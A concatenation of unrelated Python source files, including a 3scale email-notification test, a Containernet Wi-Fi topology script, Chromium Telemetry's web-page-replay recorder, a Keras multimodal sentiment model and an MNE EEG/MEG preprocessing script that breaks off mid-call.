self._fast_reader_enabled = fast_reader_enabled
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(SpecificData, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SpecificData):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, SpecificData):
return True
return self.to_dict() != other.to_dict()
|
python
|
"""
Rewrite spec/functional_specs/email_accounts_spec.rb
Creates account and checks, if the emails informing about the
new service subscription, new application sign-up to service and application
subscription to an app plan have been sent.
"""
import os
import re
import pytest
import yaml
import backoff
from testsuite import rawobj
from testsuite.utils import blame
# Asynchronous 3scale e-mail notifications can be significantly delayed in case
# of many requests, therefore not parallel run for this.
pytestmark = [pytest.mark.disruptive]
@pytest.fixture(scope="module")
def application(service, custom_application, custom_app_plan, lifecycle_hooks, request):
"application bound to the account and service with specific description that don't break yaml parsing"
plan = custom_app_plan(rawobj.ApplicationPlan(blame(request, "aplan")), service)
app = custom_application(
rawobj.Application(blame(request, "app"), plan, "Api signup"), hooks=lifecycle_hooks,
annotate=False)
service.proxy.deploy()
return app
@pytest.fixture(scope="module")
def mail_template(account, application, testconfig) -> dict:
"""loads the mail templates and substitutes the variables"""
dirname = os.path.dirname(__file__)
with open(f"{dirname}/mail_templates.yml", encoding="utf8") as stream:
yaml_string = stream.read()
yaml_string = yaml_string.replace("<test_account>", account.entity_name) \
.replace("<test_group>", account.entity['org_name']) \
.replace("<threescale_superdomain>", testconfig["threescale"]["superdomain"]) \
.replace("<account_email_domain>", "anything.invalid") \
.replace("<username>", "admin") \
.replace("<tenant>", "3scale") \
.replace("<service>", application['service_name']) \
.replace("<aplan>", application['plan_name']) \
.replace("<application>", application['name']) \
.replace("<app_description>", application['description']) \
.replace("\\[", "\\[") \
.replace("\\]", "\\]") # replaces '\\]' with '\]'
return yaml.safe_load(yaml_string)
def headers(msg, filter_keys=None):
"""Mailhog message headers with optional filtering"""
return {
k: ", ".join(v)
for k, v in msg["Content"]["Headers"].items()
if (not filter_keys or k in filter_keys)
}
def body(msg):
"""Mailhog message body"""
return msg["Content"]["Body"].replace("=\r\n", "").replace("\r\n", "")
def message_match(tpl, key, text):
"""True if text matches tpl for the key"""
for i in tpl["subject_templates"].values():
if re.fullmatch(i[key], text):
return True
return False
# requires mailhog *AND* special deployment with preconfigured smtp secret
# pylint: disable=unused-argument
@backoff.on_exception(backoff.fibo, AssertionError, max_tries=10, jitter=None)
@pytest.mark.sandbag
def test_emails_after_account_creation(mailhog_client, mail_template):
"""
Checks that the total number of matching emails is three.
"""
tpl = mail_template # safe few letters
messages = mailhog_client.messages()["items"]
assert messages, "Mailhog inbox is empty"
messages = [m for m in messages if message_match(tpl, "Headers", headers(m)["X-SMTPAPI"])]
assert messages, f"Didn't find assumed X-SMTPAPI: {tpl['Headers']}"
messages = [m for m in messages if headers(m, filter_keys=tpl["equal_templates"].keys()) == tpl["equal_templates"]]
assert messages, f"Didn't find any email sent to expected account identified by {tpl['equal_templates']}"
messages = [m for m in messages if message_match(tpl, "Body", body(m))]
assert len(messages) == 3
# Yeah! Cleanup in the test. This shouldn't be here because it won't clean
# in case of failure. A reason to have it here is the fact that this
# version of test doesn't contain separate function to filter tested
# message (probably the author was lazy), also separate function scoped can
# be dangerous due to backoff/flakiness. On the other hand it isn't that
# "devastating" if messages are not cleaned as the mailhog receives too
# many other emails and it is flooded anyway. However better implementation
# with cleanup in fixture is highly desirable.
mailhog_client.delete([m["ID"] for m in messages])
|
python
|
a, b, x, y = (int(input()) for _ in range(4))
p, q = (x - 1) * a + x, (x + 1) * a + x
e, r = (y - 1) * b + y, (y + 1) * b + y
print(-1 if q < e or r < p else str(max(p, e)) + ' ' + str(min(q, r)))
|
python
|
#!/usr/bin/python
"""
This is the most simple example to showcase Containernet.
"""
from containernet.net import Containernet
from containernet.node import DockerSta
from containernet.cli import CLI
from containernet.term import makeTerm
from mininet.log import info, setLogLevel
from mn_wifi.link import wmediumd
from mn_wifi.wmediumdConnector import interference
import sys
import os
def topology():
net = Containernet(link=wmediumd, wmediumd_mode=interference, noise_th=-91, fading_cof=3)
info('*** Adding docker containers\n')
sta1 = net.addStation('sta1', ip='10.0.0.3', mac='00:02:00:00:00:10',
cls=DockerSta, dimage="cornet:focalfoxyNWH", cpu_shares=20)
sta2 = net.addStation('sta2', ip='10.0.0.4', mac='00:02:00:00:00:11',
cls=DockerSta, dimage="cornet:focalfoxyNWH", cpu_shares=20)
ap1 = net.addAccessPoint('ap1')
c0 = net.addController('c0')
#d1 = net.addDocker('d1', ip='10.0.0.5', dimage="cornet:focalfoxyNWH")
#info('*** Adding switch\n')
#s1 = net.addSwitch('s1')
info("*** adding links")
#net.addLink(ap1,s1)
#net.addLink(d1,ap1)
info('*** Configuring WiFi nodes\n')
net.configureWifiNodes()
if '-p' not in args:
net.plotGraph(max_x=500, max_y=500)
info('*** Starting network\n')
net.build()
#s1.start([c0])
ap1.start([c0])
#makeTerm(sta1, cmd="bash -c 'apt-get update && apt-get install iw;'")
#makeTerm(sta2, cmd="bash -c 'apt-get update && apt-get install iw;'")
#sta1.cmd('iw dev sta1-wlan0 connect new-ssid')
#sta2.cmd('iw dev sta2-wlan0 connect new-ssid')
info('*** Running CLI\n')
CLI(net)
info('*** Stopping network\n')
net.stop()
if __name__ == '__main__':
os.system('sudo service network-manager stop')
setLogLevel('debug')
topology()
|
python
|
from ErnosCube.mutation_node import MutationNode
from ErnosCube.cube_mutation import CubeMutation
from pytest import mark
class TestMutationNode:
"""Collection of all tests run on instances of the MutationNode."""
@mark.dependency(name="construction_1")
def test_construction_1(self):
MutationNode(None, None, None)
@mark.dependency(name="make_mut_seq_1", depends=["construction_1"])
def test_make_mut_seq_1(self):
root = MutationNode(None, None, None)
mut_seq = root.make_mut_seq(CubeMutation.e)
assert len(mut_seq) == 1
assert mut_seq[0] == CubeMutation.e
@mark.dependency(
name="construction_2", depends=["construction_1", "make_mut_seq_1"]
)
def test_construction_2(self):
root = MutationNode(None, None, None)
mutation = CubeMutation.e
mut_seq = root.make_mut_seq(mutation)
child = MutationNode(root, mutation, mut_seq)
assert root.parent is None
assert root.mutation is None
assert len(root.children) == 1
assert root.children[0] == child
assert len(root.mut_seq) == 0
assert child.parent is root
assert child.mutation == mutation
assert len(child.children) == 0
assert len(child.mut_seq) == 1
assert child.mut_seq[0] == mutation
@mark.dependency(name="make_mut_seq_2", depends=["construction_2"])
def test_make_mut_seq_2(self):
root = MutationNode(None, None, None)
mutation = CubeMutation.e
mut_seq = root.make_mut_seq(mutation)
child = MutationNode(root, mutation, mut_seq)
mut_seq_2 = child.make_mut_seq(mutation)
assert len(mut_seq_2) == 2
assert mut_seq_2[0] == mutation
assert mut_seq_2[1] == mutation
|
python
|
import numpy
from SLIX import toolbox, io, visualization
import matplotlib
from matplotlib import pyplot as plt
import pytest
import shutil
import os
matplotlib.use('agg')
class TestVisualization:
def test_visualize_unit_vectors(self):
example = io.imread('tests/files/demo.nii')
peaks = toolbox.significant_peaks(example, use_gpu=False)
centroid = toolbox.centroid_correction(example, peaks, use_gpu=False)
direction = toolbox.direction(peaks, centroid, use_gpu=False)
unit_x, unit_y = toolbox.unit_vectors(direction, use_gpu=False)
visualization.unit_vectors(unit_x, unit_y, thinout=10)
plt.savefig('tests/output/vis/unit_vectors.tiff', dpi=100,
bbox_inches='tight')
orig = io.imread('tests/files/vis/unit_vectors.tiff')
to_compare = io.imread('tests/output/vis/unit_vectors.tiff')
if numpy.all(numpy.isclose(orig - to_compare, 0)):
assert True
else:
io.imwrite('tests/output/vis/unit_vectors-diff.tiff', orig - to_compare)
assert False
def test_visualize_unit_vector_distribution(self):
example = io.imread('tests/files/demo.nii')
peaks = toolbox.significant_peaks(example, use_gpu=False)
centroid = toolbox.centroid_correction(example, peaks, use_gpu=False)
direction = toolbox.direction(peaks, centroid, use_gpu=False)
unit_x, unit_y = toolbox.unit_vectors(direction, use_gpu=False)
visualization.unit_vector_distribution(unit_x, unit_y, thinout=15, vector_width=5, alpha=0.01)
plt.savefig('tests/output/vis/unit_vector_distribution.tiff', dpi=100,
bbox_inches='tight')
orig = io.imread('tests/files/vis/unit_vector_distribution.tiff')
to_compare = io.imread('tests/output/vis/unit_vector_distribution.tiff')
if numpy.all(numpy.isclose(orig - to_compare, 0)):
assert True
else:
io.imwrite('tests/output/vis/unit_vector_distribution-diff.tiff', orig - to_compare)
assert False
def test_visualize_parameter_map(self):
example = io.imread('tests/files/demo.nii')
prominence = toolbox.mean_peak_prominence(example, kind_of_normalization=1, use_gpu=False)
visualization.parameter_map(prominence, colorbar=False)
plt.savefig('tests/output/vis/parameter_map.tiff', dpi=100,
bbox_inches='tight')
orig = io.imread('tests/files/vis/parameter_map.tiff')
to_compare = io.imread('tests/output/vis/parameter_map.tiff')
assert numpy.all(numpy.isclose(orig - to_compare, 0))
def test_visualize_direction_one_dir(self):
image = numpy.arange(0, 180)
hsv_image = visualization.direction(image)
assert numpy.all(hsv_image[0, :] == [1, 0, 0])
assert numpy.all(hsv_image[30, :] == [1, 1, 0])
assert numpy.all(hsv_image[60, :] == [0, 1, 0])
assert numpy.all(hsv_image[90, :] == [0, 1, 1])
assert numpy.all(hsv_image[120, :] == [0, 0, 1])
assert numpy.all(hsv_image[150, :] == [1, 0, 1])
def test_visualize_direction_multiple_dir(self):
first_dir = numpy.arange(0, 180)[..., numpy.newaxis, numpy.newaxis]
second_dir = (first_dir + 30) % 180
second_dir[0:45] = -1
third_dir = (first_dir + 60) % 180
third_dir[0:90] = -1
fourth_dir = (first_dir + 90) % 180
fourth_dir[0:135] = -1
stack_direction = numpy.concatenate((first_dir,
second_dir,
third_dir,
fourth_dir),
axis=-1)
hsv_image = visualization.direction(stack_direction)
print(hsv_image)
# Check first direction
assert numpy.all(hsv_image[0, 0, :] == [1, 0, 0])
assert numpy.all(hsv_image[1, 1, :] == [1, 0, 0])
assert numpy.all(hsv_image[0, 1, :] == [1, 0, 0])
assert numpy.all(hsv_image[1, 0, :] == [1, 0, 0])
assert numpy.all(hsv_image[60, 0, :] == [1, 1, 0])
assert numpy.all(hsv_image[61, 1, :] == [1, 1, 0])
assert numpy.all(hsv_image[60, 1, :] == [1, 1, 0])
assert numpy.all(hsv_image[61, 0, :] == [1, 1, 0])
# Probe check second direction
assert numpy.all(hsv_image[120, 0, :] == [0, 1, 0])
assert numpy.all(hsv_image[121, 1, :] == [0, 1, 0])
assert numpy.all(hsv_image[120, 1, :] == [0, 1, 1])
assert numpy.all(hsv_image[121, 0, :] == [0, 1, 1])
# Probe check third direction
assert numpy.all(hsv_image[240, 0, :] == [0, 0, 1])
assert numpy.all(hsv_image[240, 1, :] == [1, 0, 0])
assert numpy.all(hsv_image[241, 0, :] == [1, 0, 1])
assert numpy.all(hsv_image[241, 1, :] == [0, 0, 0])
# Probe check fourth direction
assert numpy.all(hsv_image[300, 0, :] == [1, 0, 1])
assert numpy.all(hsv_image[300, 1, :] == [1, 1, 0])
assert numpy.all(hsv_image[301, 0, :] == [1, 0, 0])
assert numpy.all(hsv_image[301, 1, :] == [0, 1, 0])
@pytest.fixture(scope="session", autouse=True)
def run_around_tests(request):
if not os.path.isdir('tests/output/vis'):
os.makedirs('tests/output/vis')
# A test function will be run at this point
yield
def remove_test_dir():
if os.path.isdir('tests/output/vis'):
# shutil.rmtree('tests/output/vis')
pass
request.addfinalizer(remove_test_dir)
@pytest.fixture(scope="function", autouse=True)
def run_around_single_test(request):
plt.clf()
plt.cla()
plt.close()
plt.axis('off')
# A test function will be run at this point
yield
|
python
|
# Copyright 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import absolute_import
import argparse
import logging
import shutil
import sys
import tempfile
import six
from telemetry import benchmark
from telemetry import story
from telemetry.internal.browser import browser_options
from telemetry.internal.results import results_options
from telemetry.internal import story_runner
from telemetry.internal.util import binary_manager
from telemetry.page import legacy_page_test
from telemetry.util import matching
from telemetry.util import wpr_modes
from py_utils import discover
import py_utils
DEFAULT_LOG_FORMAT = (
'(%(levelname)s) %(asctime)s %(module)s.%(funcName)s:%(lineno)d '
'%(message)s')
class RecorderPageTest(legacy_page_test.LegacyPageTest):
def __init__(self, page_test):
super(RecorderPageTest, self).__init__()
self._page_test = page_test
self._platform = None
@property
def platform(self):
return self._platform
def CustomizeBrowserOptions(self, options):
if self._page_test:
self._page_test.CustomizeBrowserOptions(options)
def WillStartBrowser(self, browser):
if self.platform is not None:
assert browser.GetOSName() == self.platform
self._platform = browser.GetOSName() # Record platform name from browser.
if self._page_test:
self._page_test.WillStartBrowser(browser)
def DidStartBrowser(self, browser):
if self._page_test:
self._page_test.DidStartBrowser(browser)
def WillNavigateToPage(self, page, tab):
"""Override to ensure all resources are fetched from network."""
tab.ClearCache(force=False)
if self._page_test:
self._page_test.WillNavigateToPage(page, tab)
def DidNavigateToPage(self, page, tab):
if self._page_test:
self._page_test.DidNavigateToPage(page, tab)
tab.WaitForDocumentReadyStateToBeComplete()
py_utils.WaitFor(tab.HasReachedQuiescence, 30)
def CleanUpAfterPage(self, page, tab):
if self._page_test:
self._page_test.CleanUpAfterPage(page, tab)
def ValidateAndMeasurePage(self, page, tab, results):
if self._page_test:
self._page_test.ValidateAndMeasurePage(page, tab, results)
def _GetSubclasses(base_dir, cls):
"""Returns all subclasses of |cls| in |base_dir|.
Args:
cls: a class
Returns:
dict of {underscored_class_name: benchmark class}
"""
return discover.DiscoverClasses(base_dir, base_dir, cls,
index_by_class_name=True)
def _MaybeGetInstanceOfClass(target, base_dir, cls):
if isinstance(target, cls):
return target
classes = _GetSubclasses(base_dir, cls)
return classes[target]() if target in classes else None
def _PrintAllImpl(all_items, item_name, output_stream):
output_stream.write('Available %s\' names with descriptions:\n' % item_name)
keys = sorted(all_items.keys())
key_description = [(k, all_items[k].Description()) for k in keys]
_PrintPairs(key_description, output_stream)
output_stream.write('\n')
def _PrintAllBenchmarks(base_dir, output_stream):
# TODO: reuse the logic of finding supported benchmarks in benchmark_runner.py
# so this only prints out benchmarks that are supported by the recording
# platform.
_PrintAllImpl(_GetSubclasses(base_dir, benchmark.Benchmark), 'benchmarks',
output_stream)
def _PrintAllStories(base_dir, output_stream):
# TODO: actually print all stories once record_wpr support general
# stories recording.
_PrintAllImpl(_GetSubclasses(base_dir, story.StorySet), 'story sets',
output_stream)
def _PrintPairs(pairs, output_stream, prefix=''):
"""Prints a list of string pairs with alignment."""
first_column_length = max(len(a) for a, _ in pairs)
format_string = '%s%%-%ds %%s\n' % (prefix, first_column_length)
for a, b in pairs:
output_stream.write(format_string % (a, b.strip()))
class WprRecorder(object):
def __init__(self, base_dir, target, args=None):
self._base_dir = base_dir
self._output_dir = tempfile.mkdtemp()
try:
self._options = self._CreateOptions()
self._benchmark = _MaybeGetInstanceOfClass(target, base_dir,
benchmark.Benchmark)
self._parser = self._options.CreateParser(usage='See %prog --help')
self._AddCommandLineArgs()
self._ParseArgs(args)
self._ProcessCommandLineArgs()
page_test = None
if self._benchmark is not None:
test = self._benchmark.CreatePageTest(self.options)
# Object only needed for legacy pages; newer benchmarks don't need this.
if isinstance(test, legacy_page_test.LegacyPageTest):
page_test = test
self._record_page_test = RecorderPageTest(page_test)
self._page_set_base_dir = (
self._options.page_set_base_dir if self._options.page_set_base_dir
else self._base_dir)
self._story_set = self._GetStorySet(target)
except:
self._CleanUp()
raise
def __enter__(self):
return self
def __exit__(self, *args):
self._CleanUp()
@property
def options(self):
return self._options
def _CreateOptions(self):
options = browser_options.BrowserFinderOptions()
options.browser_options.wpr_mode = wpr_modes.WPR_RECORD
options.intermediate_dir = self._output_dir
return options
def _CleanUp(self):
shutil.rmtree(self._output_dir)
def CreateResults(self):
if self._benchmark is not None:
benchmark_name = self._benchmark.Name()
benchmark_description = self._benchmark.Description()
else:
benchmark_name = 'record_wpr'
benchmark_description = None
return results_options.CreateResults(
self._options,
benchmark_name=benchmark_name,
benchmark_description=benchmark_description,
report_progress=True)
def _AddCommandLineArgs(self):
self._parser.add_option('--page-set-base-dir', action='store',
type='string')
story_runner.AddCommandLineArgs(self._parser)
if self._benchmark is not None:
self._benchmark.AddCommandLineArgs(self._parser)
self._benchmark.SetArgumentDefaults(self._parser)
self._parser.add_option('--upload', action='store_true')
self._parser.add_option('--use-local-wpr', action='store_true',
help='Builds and runs WPR from Catapult. '
'Also enables WPR debug output to STDOUT.')
self._SetArgumentDefaults()
def _SetArgumentDefaults(self):
self._parser.set_defaults(output_formats=['none'])
def _ParseArgs(self, args=None):
args_to_parse = sys.argv[1:] if args is None else args
self._parser.parse_args(args_to_parse)
def _ProcessCommandLineArgs(self):
story_runner.ProcessCommandLineArgs(self._parser, self._options)
if self._options.use_live_sites:
self._parser.error("Can't --use-live-sites while recording")
if self._benchmark is not None:
self._benchmark.ProcessCommandLineArgs(self._parser, self._options)
def _GetStorySet(self, target):
if self._benchmark is not None:
return self._benchmark.CreateStorySet(self._options)
story_set = _MaybeGetInstanceOfClass(target, self._page_set_base_dir,
story.StorySet)
if story_set is None:
sys.stderr.write('Target %s is neither benchmark nor story set.\n'
% target)
if not self._HintMostLikelyBenchmarksStories(target):
sys.stderr.write(
'Found no similar benchmark or story. Please use '
'--list-benchmarks or --list-stories to list candidates.\n')
self._parser.print_usage()
sys.exit(1)
return story_set
def _HintMostLikelyBenchmarksStories(self, target):
def _Impl(all_items, category_name):
candidates = matching.GetMostLikelyMatchedObject(
six.iteritems(all_items), target, name_func=lambda kv: kv[1].Name())
if candidates:
sys.stderr.write('\nDo you mean any of those %s below?\n' %
category_name)
_PrintPairs([(k, v.Description()) for k, v in candidates], sys.stderr)
return True
return False
has_benchmark_hint = _Impl(
_GetSubclasses(self._base_dir, benchmark.Benchmark), 'benchmarks')
has_story_hint = _Impl(
_GetSubclasses(self._base_dir, story.StorySet), 'stories')
return has_benchmark_hint or has_story_hint
def Record(self, results):
assert self._story_set.wpr_archive_info, (
'Pageset archive_data_file path must be specified.')
# Always record the benchmark one time only.
self._options.pageset_repeat = 1
self._story_set.wpr_archive_info.AddNewTemporaryRecording()
self._record_page_test.CustomizeBrowserOptions(self._options)
story_runner.RunStorySet(
self._record_page_test,
self._story_set,
self._options,
results)
def HandleResults(self, results, upload_to_cloud_storage):
if results.had_failures or results.had_skips:
logging.warning('Some pages failed and/or were skipped. The recording '
'has not been updated for these pages.')
results.Finalize()
self._story_set.wpr_archive_info.AddRecordedStories(
[run.story for run in results.IterStoryRuns() if run.ok],
upload_to_cloud_storage,
target_platform=self._record_page_test.platform)
def Main(environment, **log_config_kwargs):
# the log level is set in browser_options
log_config_kwargs.pop('level', None)
log_config_kwargs.setdefault('format', DEFAULT_LOG_FORMAT)
logging.basicConfig(**log_config_kwargs)
parser = argparse.ArgumentParser(
usage='Record a benchmark or a story (page set).')
parser.add_argument(
'benchmark',
help=('benchmark name. This argument is optional. If both benchmark name '
'and story name are specified, this takes precedence as the '
'target of the recording.'),
nargs='?')
parser.add_argument('--story', help='story (page set) name')
parser.add_argument('--list-stories', dest='list_stories',
action='store_true', help='list all story names.')
parser.add_argument('--list-benchmarks', dest='list_benchmarks',
action='store_true', help='list all benchmark names.')
parser.add_argument('--upload', action='store_true',
help='upload to cloud storage.')
args, extra_args = parser.parse_known_args()
if args.list_benchmarks or args.list_stories:
if args.list_benchmarks:
_PrintAllBenchmarks(environment.top_level_dir, sys.stderr)
if args.list_stories:
_PrintAllStories(environment.top_level_dir, sys.stderr)
return 0
target = args.benchmark or args.story
if not target:
sys.stderr.write('Please specify target (benchmark or story). Please refer '
'usage below\n\n')
parser.print_help()
return 0
binary_manager.InitDependencyManager(environment.client_configs)
# TODO(crbug.com/1111556): update WprRecorder so that it handles the
# difference between recording a benchmark vs recording a story better based
# on the distinction between args.benchmark & args.story
with WprRecorder(environment.top_level_dir,
target, extra_args) as wpr_recorder:
results = wpr_recorder.CreateResults()
wpr_recorder.Record(results)
wpr_recorder.HandleResults(results, args.upload)
return min(255, results.num_failed)
|
python
|
"""Kata url: https://www.codewars.com/kata/61123a6f2446320021db987d."""
from typing import Optional
def prev_mult_of_three(n: int) -> Optional[int]:
while n % 3:
n //= 10
return n or None
|
python
|
import numpy as np, json
import pickle, sys, argparse
from keras.models import Model
from keras import backend as K
from keras import initializers
from keras.optimizers import RMSprop
from keras.utils import to_categorical
from keras.callbacks import EarlyStopping, Callback, ModelCheckpoint
from keras.layers import *
from sklearn.metrics import classification_report, confusion_matrix, precision_recall_fscore_support, accuracy_score
global seed
seed = 1337
np.random.seed(seed)
import gc
from sklearn.metrics import mean_squared_error
from scipy.stats import pearsonr
from scipy.spatial.distance import cosine
#=============================================================
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
#=============================================================
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.log_device_placement = True
set_session(tf.Session(config=config))
#==============================================================
def calc_valid_result(result, valid_label, valid_mask, print_detailed_results=False):
true_label=[]
predicted_label=[]
for i in range(result.shape[0]):
for j in range(result.shape[1]):
if valid_mask[i,j]==1:
true_label.append(np.argmax(valid_label[i,j] ))
predicted_label.append(np.argmax(result[i,j] ))
if print_detailed_results:
print ("Confusion Matrix :")
print (confusion_matrix(true_label, predicted_label))
print ("Classification Report :")
print (classification_report(true_label, predicted_label))
# print ("Accuracy ", accuracy_score(true_label, predicted_label))
return accuracy_score(true_label, predicted_label)
def attention(att_type, x, y):
if att_type == 'simple':
m_dash = dot([x, y], axes=[2,2])
m = Activation('softmax')(m_dash)
h_dash = dot([m, y], axes=[2,1])
return multiply([h_dash, x])
elif att_type == 'gated':
alpha_dash = dot([y, x], axes=[2,2])
alpha = Activation('softmax')(alpha_dash)
x_hat = Permute((2, 1))(dot([x, alpha], axes=[1,2]))
return multiply([y, x_hat])
else:
print ('Attention type must be either simple or gated.')
def mmmu(td_text, td_audio, td_video):
va_att = attention('simple', td_video, td_audio)
vt_att = attention('simple', td_video, td_text)
av_att = attention('simple', td_audio, td_video)
at_att = attention('simple', td_audio, td_text)
tv_att = attention('simple', td_text, td_video)
ta_att = attention('simple', td_text, td_audio)
return concatenate([va_att, vt_att, av_att, at_att, tv_att, ta_att, td_video, td_audio, td_text])
def musa(td_text, td_audio, td_video):
vv_att = attention('simple', td_video, td_video)
tt_att = attention('simple', td_text, td_text)
aa_att = attention('simple', td_audio, td_audio)
return concatenate([aa_att, vv_att, tt_att, td_video, td_audio, td_text])
def mmuu(td_text, td_audio, td_video, td_units):
attention_features = []
for j in range(max_segment_len):
m1 = Lambda(lambda x: x[:, j:j+1, :])(td_video)
m2 = Lambda(lambda x: x[:, j:j+1, :])(td_audio)
m3 = Lambda(lambda x: x[:, j:j+1, :])(td_text)
utterance_features = concatenate([m1, m2, m3], axis=1)
mmuu_attention = attention('simple', utterance_features, utterance_features)
attention_features.append(mmuu_attention)
merged_attention = concatenate(attention_features, axis=1)
if timedistributed:
merged_attention = Lambda(lambda x: K.reshape(x, (-1, max_segment_len, 3*td_units)))(merged_attention)
else:
merged_attention = Lambda(lambda x: K.reshape(x, (-1, max_segment_len, 3*r_units)))(merged_attention)
return concatenate([merged_attention, td_video, td_audio, td_text])
def featuresExtraction():
global train_text, train_audio, train_video, train_label, train_mask
global valid_text, valid_audio, valid_video, valid_label, valid_mask
global test_text, test_audio, test_video, test_label, test_mask
global max_segment_len
text = np.load('MOSEI/text.npz',mmap_mode='r')
audio = np.load('MOSEI/audio.npz',mmap_mode='r')
video = np.load('MOSEI/video.npz',mmap_mode='r')
train_text = text['train_data']
train_audio = audio['train_data']
train_video = video['train_data']
valid_text = text['valid_data']
valid_audio = audio['valid_data']
valid_video = video['valid_data']
test_text = text['test_data']
test_audio = audio['test_data']
test_video = video['test_data']
train_label = video['trainSentiLabel']
train_label = to_categorical(train_label>=0)
valid_label = video['validSentiLabel']
valid_label = to_categorical(valid_label>=0)
test_label = video['testSentiLabel']
test_label = to_categorical(test_label>=0)
train_length = video['train_length']
valid_length = video['valid_length']
test_length = video['test_length']
max_segment_len = train_text.shape[1]
train_mask = np.zeros((train_video.shape[0], train_video.shape[1]), dtype='float')
valid_mask = np.zeros((valid_video.shape[0], valid_video.shape[1]), dtype='float')
test_mask = np.zeros((test_video.shape[0], test_video.shape[1]), dtype='float')
for i in xrange(len(train_length)):
train_mask[i,:train_length[i]]=1.0
for i in xrange(len(valid_length)):
valid_mask[i,:valid_length[i]]=1.0
for i in xrange(len(test_length)):
test_mask[i,:test_length[i]]=1.0
def multimodal_cross_attention(attn_type, recurrent, timedistributed):
featuresExtraction()
# run each model 2 times with different seeds and find best result among these runs
runs = 1
best_accuracy = 0
for i in range(runs):
drop0 = 0.3
drop1 = 0.3
r_drop = 0.3
td_units = 100
r_units = 300
in_text = Input(shape=(train_text.shape[1], train_text.shape[2]))
in_audio = Input(shape=(train_audio.shape[1], train_audio.shape[2]))
in_video = Input(shape=(train_video.shape[1], train_video.shape[2]))
masked_text = Masking(mask_value=0)(in_text)
masked_audio = Masking(mask_value=0)(in_audio)
masked_video = Masking(mask_value=0)(in_video)
rnn_text = Bidirectional(GRU(r_units, return_sequences=True, dropout=r_drop, recurrent_dropout=r_drop), merge_mode='concat')(masked_text)
rnn_audio = Bidirectional(GRU(r_units, return_sequences=True, dropout=r_drop, recurrent_dropout=r_drop), merge_mode='concat')(masked_audio)
rnn_video = Bidirectional(GRU(r_units, return_sequences=True, dropout=r_drop, recurrent_dropout=r_drop), merge_mode='concat')(masked_video)
inter_text = Dropout(drop0)(rnn_text)
inter_audio = Dropout(drop0)(rnn_audio)
inter_video = Dropout(drop0)(rnn_video)
td_text = Dropout(drop1)(TimeDistributed(Dense(td_units, activation='relu'))(inter_text))
td_audio = Dropout(drop1)(TimeDistributed(Dense(td_units, activation='relu'))(inter_audio))
td_video = Dropout(drop1)(TimeDistributed(Dense(td_units, activation='relu'))(inter_video))
if attn_type == 'mmmu': ## cross modal cross utterance attention ##
merged = mmmu(td_text, td_audio, td_video)
elif attn_type == 'musa': ## uni modal cross utterance attention ##
merged = musa(td_text, td_audio, td_video)
elif attn_type == 'mmuu': ## cross modal uni utterance attention ##
merged = mmuu(td_text, td_audio, td_video, td_units)
elif attn_type == 'None': ## no attention ##
merged = concatenate([td_text, td_audio, td_video])
else:
print ("attn type must be either 'mmmu' or 'mu_sa' or 'mmuu' or 'None'.")
# ==================================================================================================================
output = TimeDistributed(Dense(2, activation='softmax'))(merged)
model = Model([in_text, in_audio, in_video], output)
model.compile(optimizer='adam', loss='binary_crossentropy', sample_weight_mode='temporal', metrics=['accuracy'])
# ==================================================================================================================
path = 'weights/trimodal_run_' + str(i) + '.hdf5'
check1 = EarlyStopping(monitor='val_loss', patience=10)
check2 = ModelCheckpoint(path, monitor='val_acc', verbose=0, save_best_only=True, mode='max')
np.random.seed(i)
history = model.fit([train_text, train_audio, train_video], train_label,
epochs=100,
batch_size=32,
sample_weight=train_mask,
shuffle=True,
callbacks=[check1, check2],
validation_data=([valid_text, valid_audio, valid_video], valid_label, valid_mask),
verbose=1)
acc = max(history.history['val_acc'])
if acc > best_accuracy:
best_accuracy = acc
model.load_weights(path)
result = model.predict([test_text, test_audio, test_video])
np.ndarray.dump(result,open('results/prediction_run_' + str(i) +'.np', 'wb'))
################### release gpu memory ###################
K.clear_session()
del model
#del history
gc.collect()
###################### write results #######################
'''open('results/dushyant/tri_result.txt', 'a').write('Recurrent: ' + str(recurrent) +
', TimeDistributed: ' + str(timedistributed) +
', Attention type: ' + str(attn_type) +
', Best Accuracy: ' + str(best_accuracy) + '\n'*2 )'''
print ('Best valid accuracy:', best_accuracy)
print ('-'*127)
if __name__=="__main__":
multimodal_cross_attention(attn_type='mmmu', recurrent=True, timedistributed=True)
multimodal_cross_attention(attn_type='musa', recurrent=True, timedistributed=True)
multimodal_cross_attention(attn_type='mmuu', recurrent=True, timedistributed=True)
multimodal_cross_attention(attn_type='None', recurrent=True, timedistributed=True)
|
python
|
import mne
import mne_bids
import numpy as np
from config import fname, n_jobs
report = mne.open_report(fname.report)
# Load raw data (tSSS already applied)
raw = mne_bids.read_raw_bids(fname.raw, fname.bids_root)
raw.load_data()
report.add_figs_to_section(raw.plot_psd(), 'PSD of unfiltered raw', 'Raw', replace=True)
raw = raw.notch_filter([50, 100])
report.add_figs_to_section(raw.plot_psd(), 'PSD of notch filtered raw', 'Raw', replace=True)
# Fit ICA to the continuous data
raw_detrended = raw.copy().filter(1, None)
ica = mne.preprocessing.ICA(n_components=0.99).fit(raw_detrended)
ica.save(fname.ica)
# Get ICA components that capture eye blinks
eog_epochs = mne.preprocessing.create_eog_epochs(raw_detrended)
_, eog_scores = ica.find_bads_eog(raw_detrended)
ica.exclude = np.flatnonzero(abs(eog_scores) > 0.2)
report.add_figs_to_section(ica.plot_scores(eog_scores), 'Correlation between ICA components and EOG channel', 'ICA',
replace=True)
report.add_figs_to_section(ica.plot_properties(eog_epochs, picks=ica.exclude),
